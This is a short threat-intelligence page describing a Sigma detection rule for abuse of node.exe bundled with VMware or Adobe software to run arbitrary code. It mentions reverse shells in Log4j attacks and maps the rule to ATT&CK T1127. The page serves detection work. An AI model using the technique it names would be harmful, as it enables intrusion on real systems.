Skip to content

Hide Navigation Hide TOC

Potential Arbitrary Code Execution Via Node.EXE (6640f31c-01ad-49b5-beb5-83498a5cd8bd)

Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc

Cluster A Galaxy A Cluster B Galaxy B Level
Potential Arbitrary Code Execution Via Node.EXE (6640f31c-01ad-49b5-beb5-83498a5cd8bd) Sigma-Rules Trusted Developer Utilities Proxy Execution - T1127 (ff25900d-76d5-449b-a351-8824e62fc81b) Attack Pattern 1